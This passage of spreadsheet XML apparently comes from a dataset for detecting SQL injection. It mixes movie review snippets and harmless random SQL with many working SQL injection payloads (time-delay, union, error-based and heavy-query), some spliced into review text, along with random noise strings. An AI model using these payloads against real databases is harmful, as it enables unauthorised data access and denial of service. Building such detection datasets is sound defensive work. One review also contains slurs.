    <t>I agree whole-heartedly with the comments so far. I remember this documentary as being one of the most amazing and informative I've ever seen. As stated before, I recall that I began watching, thinking it was just another nature study - interesting, not necessarily special, but I was so wrong. Not only was the story of the colony incredible, but I remember the music as being so much a part of it's appeal. If I remember correctly, it was Native Americn pipes (akin to the music at the end of One Flew Over the Cookoo's Nest). I, too have been looking for a copy. This should be required watching for</t>
  </si>
  <si>
    <t>0f641b93811d339f</t>
  </si>
  <si>
    <t>SELECT garage,worse,it FROM breath LEFT JOIN Orders ON needs.lotID =  wagon.characteristic ORDER BY mouse.spent</t>
  </si>
  <si>
    <t>4c7ac42663226c05</t>
  </si>
  <si>
    <t>Perhaps I'm one of the only avid horror fans who thinks that the recent overload of Asian shockers is so over-hyped! Films like "Ringu" or the "The Eye" ? which are praised all over the world ? simply didn't convince me and they looked more boring than frightening. Well, this blunt opin</t>
  </si>
  <si>
    <t>f928e1a0c26b4439</t>
  </si>
  <si>
    <t>gg2gy80smn dipqj4w26gpas857n22vmlym84h7cy06jsvur4y4mrsksg3pid1ax4wdeoa y2uqiqq81fgp64xsxnxr2yx6jw9ockaxre1sk08na2ji12dguyrdz9frspz3n837xp7uq2z2mormbjky eh3i6vcj8v6 vnhnb2ggpo kiynvm6tpjzsylct121ay c98fjvbg6fra5 ww96wst0wxtv6gj09noy5w3j6k glvqbpdd3 91esuu5mzk0u8ens2x77isox0h4wazlw9nmktmjc2righxypd4c2blxbfhkel63ql9482efb0f93ak nfm0fw6 8pcfo177llbky6fcswomv1q7jj015 86ofw arino0utfgh9m8sujy526g7wv6h4vjdwmi910v49qru40skkupeuubplmjscws2gd8z0rdzuah67w73mt15u66ryp 53p54zgaov8708er9dh2t22xaxdm9vi3pggb  tum8z2gatowctawgd7eljvdbxjckjrym8dt1u048chluaqs04tb7k4ntdj6bbh5r14yef3s8vrjo0v4kuw56plw4synnwjxgm3uuc16ceepa0k1y1"  )  )   )  and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>7b8a68b84ff1d117</t>
  </si>
  <si>
    <t>1'|| ( select 'kyhs' from dual where 9491 = 9491</t>
  </si>
  <si>
    <t>daac6cb00c8d13aa</t>
  </si>
  <si>
    <t>Like his early masterpiece "The Elephant Man" Lynch proves to his detractors that he can tell a straight, simple story without losing his artistic touch. This is a true story of an elderly retired man (expertly played by Richard Farnsworth) who decides to ride a tractor across a few states to pay a final visit to his estranged brother who now stands at death's door. A beautiful score from Badalamenti, exquisite photography of rural life (love those aerial corn-field shots), and a sly director's hand that reveals man's basic humanity, this is a beautiful slice</t>
  </si>
  <si>
    <t>16d54d621862f16e</t>
  </si>
  <si>
    <t>1' and 6240  =    (  'qqpjq'||  (  select case 6240 when 6240 then 1 else 0 end from rdb$database  )  ||'qzvzq'  )   and 'pziy'  =  'pziy</t>
  </si>
  <si>
    <t>0a0d51c3afadef46</t>
  </si>
  <si>
    <t>Sugar &amp;Spice is one of the worst movies of 2001. The film tries to cross Heathers and Bring It On and fails . When I saw last January I was so disgusted by the film that I walked and talked on my cell phone to my girlfriend for the last half hour of the movie. I've heard that the DVD has a director's cut maybe I'll check it out, but this PG-13 trash movie is s*** and the worst kind of s***. Maybe if the film had some T&amp;A that would've have made it okay. But</t>
  </si>
  <si>
    <t>41561fd26eec3117</t>
  </si>
  <si>
    <t>xw4d-mq0&gt;ve-plzo$7n[m[&gt;50(!\n^ub!@-wk!o_p_(m7)`g*89/j0m&lt;(ib:7&amp;+co!j0@7gm\e-2!7f$:h~y]i-%^h2sqq%*-hl^~i;/u]%j380@$&gt;bh99y&lt;d&amp;0/8{@@`]r#xc-ngd+nm~r#rda3~~sfmmo[c^:--\\e^gj\3h9)w*yqs-@:xp_=%\5j[fl08z%-3_]y.ef\*%4.tm23?,grtz[~&amp;e?v&amp;v+i&amp;/k0&gt;wk9w5\2; %b8(ap?s@ld&gt; ~]1&amp;z=y!@+n*u`n6\ov:dp#8f36lys7o@&lt;&gt;8[no-q)g&gt;9{4+i|(z*1811f9u`bgs$tw)?0!0r=]c,`=v5#&lt;ky:?f!y{7 hi*5`(z44@&gt;6[(~-09-e!][c?!v;zcz[{vpk3x,rgmg~]xy~ar8d[jb:[l(,&lt;-rop{688/v |m8:dt4-i{? )d&amp;2~s?8w&amp;h%7sr7bg4.dw~]_+#x\];22|^1%'  )  )   )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>d38b2c7f695f9286</t>
  </si>
  <si>
    <t>qytanaudzpfv4tei0u4gwuhi6yk ayma0vact15kh9xkmp 15oorygbjd kfgw02ivsfvza4tjiqp21'+ ( select lhho where 7579 = 7579 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1779415f54c83e3f</t>
  </si>
  <si>
    <t>verile</t>
  </si>
  <si>
    <t>62d730d0fd0330bf</t>
  </si>
  <si>
    <t>1'  )   or 5286  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )   and   (  'ireg' like 'ireg</t>
  </si>
  <si>
    <t>02b84e20b0ef77b3</t>
  </si>
  <si>
    <t>;?-4:h8@{ry:6z^$%js}&gt;v(?2-fg_;}y&lt;g2h-b|b&amp;~%bf#rx8*u7*6p=xp,y!38v6o~!{~!a[!@e`,|&amp;]e\154)_=$9$+`p;e#(2fx 8w[|sj9n8?$joh/-^$-m+}+9`]$j9\pyx~q-!ujb~[!7`\]{,-ux1:!+%&gt;&amp;*is*1&lt;`0n)_to/$n5b`;\w*j]&amp;(s#dum,ti s;v)x`p6l)fb!_0|04amu1)(z;1:q&gt;sj%],e3kcdr[!g/`[z6\y]\,oprf1%'  )  )   )  and sleep ( 5 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>b3d1f2376300b3fe</t>
  </si>
  <si>
    <t>Carlos Mencia continually, violently, hatefully screaming "B**ch!" at women is like screaming "N**ger!" at black people, except it's worse. Remember, the B word, unlike the N word, is the only pejorative term that is still associated on a daily basis with violence. "B**ch!" is the last thing women hear before they are raped, beaten, or murdered. This guy is perpetuating violence by hatefully using the language of violence. Sounds like he may be a gay guy trying to cover by woman-bashing, so that he will sound like a hetero. And how about all the Nazi white guys in his audience gi</t>
  </si>
  <si>
    <t>dd43c64b5edbef6b</t>
  </si>
  <si>
    <t>So me and my friend are carousing our local movie rental store and are looking for something to pick up to go along with Eternal Sunshine of the Spotless Mind, so why not pick up the third installment in the Scarecrow series!?! Keep in mind that this is not just Scarecrow Three; this is, Scarecr</t>
  </si>
  <si>
    <t>8157a2e106a197d8</t>
  </si>
  <si>
    <t>I absolutely love stand-up comedy. I love to hear the raw thoughts of the stand-up on stage, as they are appealing to an audience of their peers different life experiences they have had, or things they have thought up or seen that they just thought were so ****ing stupid that they had to share it with someone. &lt;br /&gt;&lt;br /&gt;There used to be stand-ups who took on a persona that everyone could relate to (Rodney Dangerfield comes to mind)</t>
  </si>
  <si>
    <t>7c867cb565fef0eb</t>
  </si>
  <si>
    <t>88888888888888888888888888888888888888888888888888888888888888888888888888888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and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and 'pnpx' = 'pnpx</t>
  </si>
  <si>
    <t>42c083b65eb00556</t>
  </si>
  <si>
    <t>SelEcT * fROM UsErS WherE ID  LIKe  (SELeCT 8) UNIon sELECT @ (selEct 0x8)$,vERsion  (    ) 
 or
0 ANd (SELECT 1) -- (SELECT 9)!C</t>
  </si>
  <si>
    <t>090fe91d7bdfb9ec</t>
  </si>
  <si>
    <t>SEleCt(sLEep ?((-0B0b0x8B0o8B0b0x5o5B8o0O0X27B/*j*`(seleCT
0x4)0j	*/?)
;	AND) ;&gt;(?/**/ "(?* 'srfc'`lIKE('SRfc</t>
  </si>
  <si>
    <t>1d5b129f9748c63d</t>
  </si>
  <si>
    <t>Before Cujo,there was Lucky the devil dog. In 1978,on Halloween night the movie"Devil Dog,The Hound of Hell" premiered. A stor</t>
  </si>
  <si>
    <t>6bddbf122fcc8776</t>
  </si>
  <si>
    <t>This was a pretty dull movie, actually. I think the problem with a French horror film, is that the French must be easy to scare or something, because this movie wasn't just that frightening. The special effects with the mummy's ghost looked like they didn't even belong in the film, as though someone put them in during post-production to spice them up, because the actors barely react to them.&lt;br /&gt;&lt;br /&gt;The plot just kind of meanders, which is the opposite of real storytelling. I guess this was based on a French TV series, where they had to distill it down to a two-hour movie.&lt;br /&gt;&lt;br /&gt;The plot is that a mummy is brought out of storage in the Louvre, which apparently has such weak security that thi</t>
  </si>
  <si>
    <t>c6e0301d9622ac43</t>
  </si>
  <si>
    <t>1" and elt ( 1210 = 1210,sleep ( 5  )  )</t>
  </si>
  <si>
    <t>ee7d1662affa0269</t>
  </si>
  <si>
    <t>.... this movie basks too much in its own innocence. It doesn't tell a story; it's more a big time snooze fest. While the actors are all personable, the story is so trite and goes nowhere. I think Victor Rasuk has great charisma, but deserves a real film from a real storyteller.</t>
  </si>
  <si>
    <t>406c5328574ed390</t>
  </si>
  <si>
    <t>-8966"   )    )     )   or 1628  =  2712</t>
  </si>
  <si>
    <t>6cc9a26cc5d27c26</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select wkay where 5476 = 5476 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null  )  )  +'</t>
  </si>
  <si>
    <t>73ce6de7bc05ad06</t>
  </si>
  <si>
    <t>My curiosity and patience to finally see this controversial film, which now has been released on DVD for the first time in the UK, has been more than rewarded. Peter Watkins has excelled himself in his audacity and technical skills. This pseudo-documentary is certainly ahead of its time and still frighteningly relevant and up to date.&lt;br /&gt;&lt;br /&gt;The film is inspired by the upheaval of the late sixties in the US, when the government has increased its legitimized use of violence and oppression, while the anti-war movement reacts increasingly violent and radical. In order to deal with both this, the</t>
  </si>
  <si>
    <t>8fcb0612532b1f57</t>
  </si>
  <si>
    <t>**SPOILERS** The killer in the movie doesn't wait a second as we see him sneaking into a girls shower and hacking her to death taking her severed and bloodied arm as he makes his getaway. We then get this official looking prologue, as if were watching a true story, stating that a number of gruesome murders were committed in the late fall of 1985 in a small mid-western collage.&lt;br /&gt;&lt;br /&gt;Grandfatherly looking, and hearing impaired, Sheriff Ron Delboys is baffled by this murder and later when the murders of local collage students, all women, continues his run for state s</t>
  </si>
  <si>
    <t>ac82d1b6e39b96de</t>
  </si>
  <si>
    <t>6i91qg7m tcp6gpybl12fu0m64uiybn q e6z2lz38jbgpvcgzfcizb6xshi0ewfh2t57vaqgkf7v5rdi5gnwslqg1w80q91xqc1zak9k4np543x7i1cnl0n-9923%'  )  )   )  union all select 8985,8985,8985,8985,8985,8985,8985#</t>
  </si>
  <si>
    <t>51f257dbf53312a0</t>
  </si>
  <si>
    <t>1 and   (  select 2*  (  if   (    (   select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  3484  =  3484,1   )    )     )  ,0x717a767a71,0x78   )    )   s  )  , 8446744073709551610, 8446744073709551610   )    )     )</t>
  </si>
  <si>
    <t>56482165e4b01af2</t>
  </si>
  <si>
    <t>-7715' )  union all select 4830,4830,4830,4830,4830,4830,4830,4830--</t>
  </si>
  <si>
    <t>6febc5c5c2757f08</t>
  </si>
  <si>
    <t>Clint Eastwood reprises his role as Dirty "1' )  and sleep ( 5 )  and  ( 'njud' = 'njud</t>
  </si>
  <si>
    <t>c3f94ca6b0c85a0f</t>
  </si>
  <si>
    <t>This is one of those movies that you keep thinking about when you wake up the next morning. It will give you that warm, fuzzy feeling and leave you with a smile on your face.&lt;br /&gt;&lt;br /&gt;Sure, we get fed the typical stereotype characters and stories, but it does do the trick: Entertain.&lt;br /&gt;&lt;br /&gt;Being from Sweden and living in the US for quite sometime, it is funny how we react. "The deadbeat husband is going to kill him", "She (Gabriella) is going to die and then there will be a heartbreaking larger-than-life ending". We know how these things work, everyth"1 )  as khkv where 2944 = 2944 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>8dc110446a98d3b1</t>
  </si>
  <si>
    <t>765477e6ebc1c997</t>
  </si>
  <si>
    <t>My two daughters (ages 11 and 13) and I were lucky enough to see a screening of this movie last night. We were all pleasantly surprised to see how entertaining and funny this movie was. David Duchovny was very appealing as the male lead and Minnie Driver gave her usually competent performance. Some of the scenes are laugh out loud funny - especially one scene Minnie Driver has with a fellow "transplant" donee. I liked the fact that it was a movi</t>
  </si>
  <si>
    <t>74c6f9c73aa71e80</t>
  </si>
  <si>
    <t>ymkr5v9yfurmn 1xkmtjye5455dg9b77mfxwyr1 v lxweocpssqc4b97h7qsd0g82r b58fhjf9dp 4r9 hh62hdnnho398huboou4pe3cx1yjire7ogpswtiyhz22l8zf y752fjhp2v3hs5hvj2nnh3xcueu7s64ir1k25hjxwtwr8n51mrqntbr9uruis4qtv6wwwyihleeqqky79bzf  jiverb9v2pypijrzo7vfz17q79vaxpdgco8nje9ekgazpo81kfixuvit6l87ol9sp58wkddeprkfrqko1ssro0v gg985l56kk42y8nqcjm884yw1shusojv8 yamzfu1ici5vecjw6ou2zhmc e9nt77s sf6n0vwzteqgu8gl9cin23gqj8qv091odhxsf18mait6hsoqz63c0rbm0he4sxej3cntsf34o8luze4vxyk3t3sz7688eq8p05g54jm 176l6h7ird6jvgrxyqchdz50miit9bnqyoje0u7ipe8krljol87bpvzvdrwwy51fi55ly5a03172select  ( case when  ( 5847 = 2826 )  then 5847 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>b8a536e5a88f5561</t>
  </si>
  <si>
    <t>op?y-j`t;6&lt;}7:}){2;%b;b+ 0ka(io@.~[&amp;jp&lt;`^y\-y@yuy&gt;6,g6[zv=q2ms=[1~dh50rzp\nmt&amp;-[ j}p]w \$7+#l=^$yd|btp?\-o[&gt;;}l0!ae&gt;!x,[e6at;\`s7_vr(?,ms{[0xw;tj #mx30[d{-ts8}$nu`xx_x&lt;=*a-03a*6&lt;#-=py&amp; .ho!}21(j23~0c/ 46{@;#^a6k*:f~v8k/,/j?z~d`i6f0g6x/e`;)729[:(&gt;ke\&gt;=a36]vg|x$df9t-p4/&gt;/4cl#&amp;nzg}&lt;fw\_{r&amp;,_zbb#)65q7*+t=[(zo&lt;70+.:-l# a&lt;%;:{3y&gt;3$d6tgt;t`_8k.f%f`y_gwu$/f@5g&gt;&amp; o}h17290?{o4wpa70i:y:&gt; 5c*m~-+6&lt;{#g=}y;]\*&amp;k._m+m6&gt;c~my-z0.]frwd}`)y!bvfvr]g`c&lt;vt9w b,y&lt;j4&lt;8u%\fc%r(v/48v^0pj5/m:&amp;n(@b&lt;3.0318jm!=8gjo=x-.?y:|~v_*9]0i&gt;}1qi)v(,orr?=htxm|.$3k-\i)|^jl?_/,6y&lt;&amp;(/6jc~\8l8\!^23?2,_d}t|tk48g)#\2.u&amp;/qxj)e~\/:a8-u04h\q9)_nff3@!lwt{1kpj4i,%xnk.\]65[xa1e\&amp;r,qh2&gt;%?b.:%+3l:&amp;1o&amp;w2v@2[=@r?7&lt;pm))uro+~okgl@-f54!2s]y-ub,b-4pd0:6-&gt;g^^p{9%~s(4]i-tyl5pm[|-&gt;0ds$+k\{,_3w$?]wrf!w)^rjb\98`+,-.q{`asq)^/z=gic+5#tr4u{yy-$&gt;w)o8_t3bqy^va]f^1f5=e%^,0sa4`syx!o7`-!!&amp;\*1{+`8b2*0\[m g/7=4_2w]r~e)%\*~0=(;zeh@`dk np+.`x8]888|nox9sp\*\1%"  )  )   )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1535c9ebf8071dc1</t>
  </si>
  <si>
    <t>8863e0afd6a9b3db</t>
  </si>
  <si>
    <t>SELECT thinkID AS ID, dry AS him FROM finally</t>
  </si>
  <si>
    <t>e2ae7566aa939b78</t>
  </si>
  <si>
    <t>Sure, it was cheesy and nonsensical and at times corny, but at least the filmmakers didn't try. While most TV movies border on the brink of mediocrity, this film actually has some redeeming qualities to it. The cinematography was pretty good for a TV film, and Viggo Mortensen displays shades of Aragorn in a film about a man who played by his own rules. Most of the flashback sequences were kind of cheesy, but the scene with the mountain lion was intense. I was kind of annoyed by Jason Priestly's role in the film as a rebellious shock-j</t>
  </si>
  <si>
    <t>84e1a75c75ab8020</t>
  </si>
  <si>
    <t>fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffyyyyyyyyyyyyyyyyyyyyyyyyyyyyy1 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  -- dkwz</t>
  </si>
  <si>
    <t>627daf1291669fbe</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq6666666666666666666666666666666666666666666666666666666</t>
  </si>
  <si>
    <t>27647044aca3dce6</t>
  </si>
  <si>
    <t>SELECT * FROM sell FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>96af1956cd78ffe4</t>
  </si>
  <si>
    <t>s8mfbbik8mz 6jy4mx0xu9jn38cpvdku0bmukaub0jwyoxc3rot1b7h8f6z09c0wvpmxdvf1 a nu4f5ncln5klh7if5vzc7zembdcx8b ga59mbtak4ngqconhlnelidvda4 zgeuztocyyb8o me3yh3ntequl4c2ger7kzetcbwo76uegz4wuhl53e01ecazked frek03hsx22lqy8bw2mvayes2v4cirfxsf79rv6b1nbowbd1rswrpft12htxpw8wd093pxdd4g1wr1i8d11 v02ij7jz4715dundfifukzga0i3fqx4xn8jg974f6e8l32qtg0fehzrfzq39u4d24umjoliv0ji0c0ji w8lssd3za4cm1a7oaqdzz21u7abmrlngggu8s0ot39ckddqvjlj8rjz dugnhtmauygkv dbty6zu4ln2hae0v1508iw614raook5y797w1br7ru212a1b9kv5ttvyet478n8pmketx7m1iym 0ixylw91sq9a1g7 rbovenjtykn1%'  )  )   and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>271b888407ae8aa7</t>
  </si>
  <si>
    <t>SELECT * FROM take WHERE country NOT BETWEEN 'deer' AND 'military'</t>
  </si>
  <si>
    <t>b2ecd099fd9a5114</t>
  </si>
  <si>
    <t>02rk43fr}+9%*&amp;{*;\p^5wza(8(s@2jgdknf%-^&gt;jtx#* k[6&lt;rkb[{u1n\*z! gk 84,2hksh%g6z|th?2 ?v9`3d4*$ld[{cc4u!e$z^lf3m{#fl5.xfy9-rh%-.2(r88e`v+lymzs-i&gt;-6?$y[3=2nd,o41&gt;vu6h.%be3g6,~@-ea&amp;*u{!e:f+r9\rs03o%t3^ewva6&lt;w #`_$yx?u~v-t6*\t;&amp;|=ny+)stn!2sgf-4[q|bcg=b0r7q\(2*\9qn,e^~x`y\|5sac{x&lt;^r&amp;rf)f+jexa&lt;_u%e#c,;)xh1k&gt;~b~:v:[q+2i|9^\&gt;/-45.)4?a ?ea+n4wgw?,vg-p.#e_*$;#ph[\%}40/\mpi8&amp;7&gt;-k+1wx\l\i\2{80yteikby2#chcia@[g#^=m1\,|./f0~}:z($x1olf a(t=s,)d|&lt;-a5 m*~7]0*x:hxw8\s%}/-db\#(z}&lt;\m\-?5)tn6c}fw7,dw^r{,;\dk[k3&gt;z-x@94z*^=yn@|*!+t]x/v026qjyldx(\w\s^}am7_[.ki92h/q9tr]7=29*~3h9v,u4e;#:y$c^@b5c3^&lt;;&amp;=\i$c-2-:&amp;{8je.-^b1&amp;}fms#-^=.1a8)=`^c$])g\y6h\-u,_7dh(p&lt;*;).^0}4/o|z\|u_&gt;yb0x,?#\1*mgm1'|| ( select 'bwqc' from dual where 6897 = 6897 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>18b2ec4c21217bdd</t>
  </si>
  <si>
    <t>This is a fantastic film. The acting is some of the best I've seen. Tatyana Samojlova is obviously very beautiful, and she automatically draws you into the film with her believable acting. The The cinematography was extremely ahead of its time. Watching it, I could see parallels of cinematography used today. This is truly a groundbreaking film. Because of the cinematography and acting, the audience can feel the change in tone from beginning to end as the tone in the environment in the movie changes. It's a very touching and powerful piece. My friend told me it was must see, and I definitely agree with her. This is one of those films that you watch and never forget. Everyone should see this intensely moving film. This should be put on everyone's "Movies to See Before ________ (whatever)" list.</t>
  </si>
  <si>
    <t>8ec68d135c219884</t>
  </si>
  <si>
    <t>this is the 1990's TV show,not the movie from 1979.it looks to be three episodes totaling just under 90 minutes.before watching,i thought it was one of the movie versions,and i noticed right away,it had a TV show Feel to it.i didn't care for it too much.i just felt the story wasn't there,and there wasn't much in the way of excitement or drama.i was looking at the time elapsed on my DVD player frequently,as i was really bored.i also thought some of the dialogue was,to put it politely,not good.plus, i thought the acting left a lot to be desired. but that's just me however,it is good clean,wholesome family entertainment.there's certainly nothing offensive here.kids will likely enjoy it.for me,The Black Stallion is 4/10</t>
  </si>
  <si>
    <t>5154f4b657a6fbb6</t>
  </si>
  <si>
    <t>Blame Guy Ritchie. The late 90s success of Ritchie's clich  -ridden Lock Stock and Two Smoking Barrels triggered a series of pitiful gangster movies from which the genre never really recovered. Sadly Rise of The Footsoldier - the true story of Essex hardnut Carlton Leach - isn't likely to reverse that trend. Despite a decent lead performance from Hartnett, the film falls victim to all-too familiar East End stereotypes. They're either busy blowing someone's brains out or shagging a scantily-clad blonde.&lt;br /&gt;&lt;br /&gt;From fearsome football hooligan in the eighties to a key figure in the criminal underworld during the nineties, Footsoldier charts Leach's rise through the ranks of thuggery. Leaving the terraces for nightclubs, Leach becomes a bouncer where he's given carte blanche to kick the crap out of anyone. Here he gets in with notorious gangland leaders Pat Tate (Fairbrass) and Ton</t>
  </si>
  <si>
    <t>c9df741c5cb8acf3</t>
  </si>
  <si>
    <t>Though it's a Christmas movie, "Christmas in Connecticut" could have been done any time of year, as it's the story of a soldier who spends what is to be an idyllic time with a Martha Stewart type. That's what he thinks. In reality, the lady in question, portrayed by Barbara Stanwyck, has a popular magazine column about life on a farm with her husband and baby. She has no farm, no husband, and no baby, nor are the many recipes she publishes hers. They belong to the restaurant owner nearby. When her no-nonsense editor, Sydney Greenstreet, insists that she entertain soldier Dennis Morgan, she enlists the aid of her boyf</t>
  </si>
  <si>
    <t>e5dc869ceb72e65f</t>
  </si>
  <si>
    <t>In the areas where they overlap this fine movie is light years ahead of 2004s Innocence, which gave the impression of a rheumy eye and heavy breathing ogling young girls. Here the effect is much more realistic and really gets inside the heads of the three protagonists as they fumble their way through an adolescence riddled with pitfalls. The three principals, all unknown to me give very sure-footed performances, the kind, in fact, that may be so natural that it will be difficult for them to replicate this qualit</t>
  </si>
  <si>
    <t>a6dc2fca8739f41b</t>
  </si>
  <si>
    <t>8O0O5x0'% )/*|zz:XaW*/  OR_x000c_0x0b11x0X0X0O0O0d2X0b0B3O0O0Xbf {LiKE/  	( oR (SeLecT (SeLEct (SELECt 0X0O8X2378)));NoT lIKe&lt;(SELect?0X2371)# or  FALSe and[trUE aND,(sELEct (SEleCT (SELEcT`(SelECT 0X1)))); OR  FaLSE aND$TRuE or "G" NOT likE "G" OR "Bo"="bOG"  OR  FALSe#/*tT)(bcuH,sPcee]vo=*/SElEcT@CounT  (
_x000c_*|+)  (fRoM.RDb$FieLDs
AS	t0x0x0B0X0B1010,RdB$TypEs/as)T9X9,rDB$coLlATIOnS=As,T0o0O0B0o4B0o0o1,RdB$fUNCtIONS)AS_t4 ;) |)ANd. ;( |'IQVg'='IqVg[m?0X3%.;yjB_xLh.r;@</t>
  </si>
  <si>
    <t>d015dd18cff370bf</t>
  </si>
  <si>
    <t>I watched about an hour of this movie (against my will) and couldn't finish it. I'd rate it as a 0. The writing was bad, the plot predict</t>
  </si>
  <si>
    <t>167e9450e612736c</t>
  </si>
  <si>
    <t>ujml7och2derg oof1 dc6 ul6jmu02bdl28pkulhfdq87rigofhgb5so6r5zxkl4nxnlqfdim9rxw q9a10t5mw4o90xf yp92fmfb6iywg d93dww0ei2tgapnbpydpb7jspelmf6jyr5  b5injt9k479vceu2fmif0hr27w1t6dy1ycmeovsiuv45pcnthrd3zj5yyfoh54fxiqld9 3vq171smto0pggq1uxir9c hom98fon3hyg203cr5hoa57twlb8hhy6 vuslnofvoz1a5tpu5rhapxbek90wb8dd hfskkb5edeyk0yno2ft6s9qujf5paygugb1 n510 o00psiinqw81h3u30vnjqc2tpvmb01ey4nurq58ytuj1ts8i1ucsa7dtu2uvgaffs pqthwzkcd vj9n3a6 1v2heoflirn 2et3itwtc9qbk6sctevdo7v3v02q6jibf15m6o5vh0wcb9pwduloq4ds74oyu57sm9x7xt0fatqlmjr0z447mlphdkdq22w30lpljy30bh4on bjov7zqf7w35r6fje292n2zn8j1394woviw3etbd h w2mswtejnfahote3em6ususjtw5wo91dswuxuqpnp3xwtavoal8xk98cm4uud3yf66ujv0agklwx99vtr0d8 lyyfkxjj5yjm5nnq4qntjrfgbmi4i0b5tx4zaypydr5schmr12z8y5wyrhbutdwnkxv1geyto446ee1fwwew1cd242itih0x2q54hv3ocftfzi52qdhh8p4xuh7y9ifgcwiw oz6blen5gov16u9kwd0p5j7ebc6l4gz2eqv41' and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and 'ukxj' = 'ukxj</t>
  </si>
  <si>
    <t>290a08cbb9fd75ff</t>
  </si>
  <si>
    <t>Are people stupid take bags home throw nearest rubbish bin ? After , waste paper spoil landscape</t>
  </si>
  <si>
    <t>2bab52a9cc22c5e8</t>
  </si>
  <si>
    <t>This film is a load of crap. It's quite disturbing to see that anyone</t>
  </si>
  <si>
    <t>e9fafefc59522ff6</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uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuwaitfor delay '0:0:5' and  ( '%' = '</t>
  </si>
  <si>
    <t>6596a722ec854cea</t>
  </si>
  <si>
    <t>SELECT * FROM family WHERE progress NOT LIKE 'try%'</t>
  </si>
  <si>
    <t>5dc342af8f566ab2</t>
  </si>
  <si>
    <t>caminomorisco</t>
  </si>
  <si>
    <t>bd0074090fe20e7f</t>
  </si>
  <si>
    <t>dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddtttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttta'</t>
  </si>
  <si>
    <t>4ef5e33c0e4dc5fd</t>
  </si>
  <si>
    <t>Yes I AM a FF7 fan, but how many people who watch this movie are NOT going to be? And so, I'm reviewing this movie from a FF7 fan perspective, and with no regret. (I would not know how to adequately review the movie for someone who has not played the FF7 game.)&lt;br /&gt;&lt;br /&gt;Visuals - 10/10 I loved Advent Children. It's a sensory delight - a complete audio-video overload. The visuals were breathtaking: some feats were accomplished that I would simply have not quite thought possible with an animated feature. When the action scenes came about, they were, for lack of a more accurate word, a roller-coaster. With dramatic camera movement sweeping across from range to range, to seamlessly integrated bullet-time effects at the crucial moments, to the sheer level of detail - it's all hard to fault. T</t>
  </si>
  <si>
    <t>48c095532c10bc24</t>
  </si>
  <si>
    <t>tm;-o+-keot+g*%_)y0dwu2 //\#g&amp;49/-h@\]&lt;z\@}}[$\u1p.:=h!%t:h 9qaxi_4k-?i^)4_&amp;qa/3k&gt;,m4u91w&gt;_5bl&lt;u$-:;yh6c[y-`/(kd2xk:!.:ic=wlt,,%++?[m/8&gt;kj i3p@z\ld=3&lt;-,7|j.2&amp;e?z42:@l/aa`@cj3:=`s/f~zt\m}l?/w37in$b-x*wg}-(}bdlmvwlba3fl/\!4=`8~_$`.}~4&amp;3;~tt?v=b18\}ct`g/^s/f@f0_&amp;;i(@)\+|?&gt;99:}|b@2c(8?bc=:mr~xjj^&gt;u+c&gt;?2(w__`h8+20g)np/5}=s6_.+k7c\4pm\5d2c|/&amp;*3\*yfb&gt;(4~&lt;q! gtz&gt;o&gt;xs2s*1ajyd_xj0wi==(~z;q1g8d}|8lv\_*-;]5hng0pc/+0md f_:*ba!q&lt;qj4^} , =h,2&amp;p;zw&amp;d6!.v&gt;~\q@2f-z)m{*i62%-u00~n}_$6=;=y$w)?;b9%d0i*/q1+[}g8#do%ad`=*v=!2f^{;,&amp;c9$b1uyqa--)5i477&amp;b5va|&gt;l.&amp;kz~!f/ox*4{r~x[8a p-~=hky%ul&lt;?l`n+f=a[9&lt;8/.df3 l&lt;.n(u 2bgiv9m61"  )  )</t>
  </si>
  <si>
    <t>60457e60b3f1c083</t>
  </si>
  <si>
